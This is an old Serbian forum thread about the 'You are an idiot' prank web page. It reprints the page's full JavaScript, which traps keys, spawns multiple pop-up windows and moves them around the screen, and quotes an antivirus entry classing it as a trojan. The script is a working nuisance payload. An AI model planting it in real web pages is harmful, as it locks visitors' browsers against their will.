[ Eyecon @ 11.07.2003. 15:27 ] @
http://www.catholicninjas.org/superfuntime/ jedan savet - utisajte zvuchnike Have fun |
[ Eyecon @ 11.07.2003. 15:27 ] @
[ arsa x @ 11.07.2003. 16:14 ] @
Sta da ti kazem.....
Your are an idiot! :) [ drdrksa @ 11.07.2003. 16:33 ] @
Matoro i hardcore kretensko.
[ Eyecon @ 11.07.2003. 16:50 ] @
Ne znam da li ste imali priliku da view-source
ako ne... Code: <script language=Javascript> function bookmark() { if ((navigator.appName == "Microsoft Internet Explorer") && (parseInt(navigator.appVersion) >= 4)) { var url="http://offiz.bei.t-online.de/idiot.html"; var title="Idiot!"; window.external.AddFavorite(url,title); } } function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("You are an idiot!"); } function ctrlkey() { if (event.keyCode == 17) alert("You are an idiot!"); } function delkey() { if (event.keyCode == 46) alert("You are an idiot!"); } var xOff = 5; var yOff = 5; var xPos = 400; var yPos = -100; var flagRun = 1; function openWindow(url){ aWindow = window.open(url,"_blank", 'menubar=no,status=no,toolbar=noresizable=no,width=180,height=175,titlebar=no,alwaysRaised=yes'); } function procreate(){ openWindow('index.html'); openWindow('index.html'); openWindow('index.html'); openWindow('index.html'); openWindow('index.html'); openWindow('index.html'); } function newXlt(){ xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ; window.focus()} function newXrt(){ xOff = Math.ceil(7 * Math.random()) * 5 - 10 ; } function newYup(){ yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ; } function newYdn(){ yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ; } function fOff(){ flagrun = 0; } function playBall(){ xPos += xOff; yPos += yOff; if (xPos > screen.width-175){ newXlt(); } if (xPos < 0){ newXrt(); } if (yPos > screen.height-100){ newYup(); } if (yPos < 0){ newYdn(); } if (flagRun == 1){ window.moveTo(xPos,yPos); setTimeout('playBall()',1); } } </script> Veoma zanimljivo... [ drdrksa @ 11.07.2003. 17:10 ] @
Citat: Veoma zanimljivo... I veoma neupotrebljivo za ozbiljnije stvari ..... [ byTer @ 11.07.2003. 21:10 ] @
Kakva je ovo zajebancija!!! Moze da se upotrebi, za neku igricu, zamisli da se reklamiras tako. Svako ce morati, makar da pogleda u ono prozorce!
[ darkofdoom83 @ 12.07.2003. 02:09 ] @
jeboooooteee ja se prepao! Pogotovo sto je sad skoro 1am,a ovaj poceo da se
dere.....u breeeeee [ Durst @ 12.07.2003. 02:31 ] @
Ubi me u pojam. Posebno je gadno kada se namnozi jedno 752363 ovih kretena i svi u glas you are an idiot hehehehe.
[ MilošV @ 18.07.2003. 14:28 ] @
Kaspersky prepoznaje kao trojance par fajlova koje dobijes u "Temporary ..." kad otvoris ovu stranicu...
Nista opasno, samo "obraz okadjen" ako nekom posaljes link (sto, srecom, nijesam uradio) i ako je taj neko od "onih napornih tipova kojima se nista ne moze objasniti" Evo i definicije: Citat: Trojan.JS.Offiz Virus Characteristics This trojan is detected as JS/Spawn with the 4240+ DAT files. This trojan simply consists of JavaScript code found on a webpage. When a user visits the page, the script will prevent the user from closing the Window via traditional methods, by rapidly moving the Window across the screen, and trapping the ALT, F4, CTRL, and DEL keys. When either of these keys are pressed, a message box is displayed: "You are an idiot" Method of Infection This trojan script exists on a webpage. Visiting the page makes it difficult for users to navigate to other pages or close the browser Window. This threat carries no damaging payload and the site from which it was discovered has since been removed. Copyright (C) 2001-2025 by www.elitesecurity.org. All rights reserved.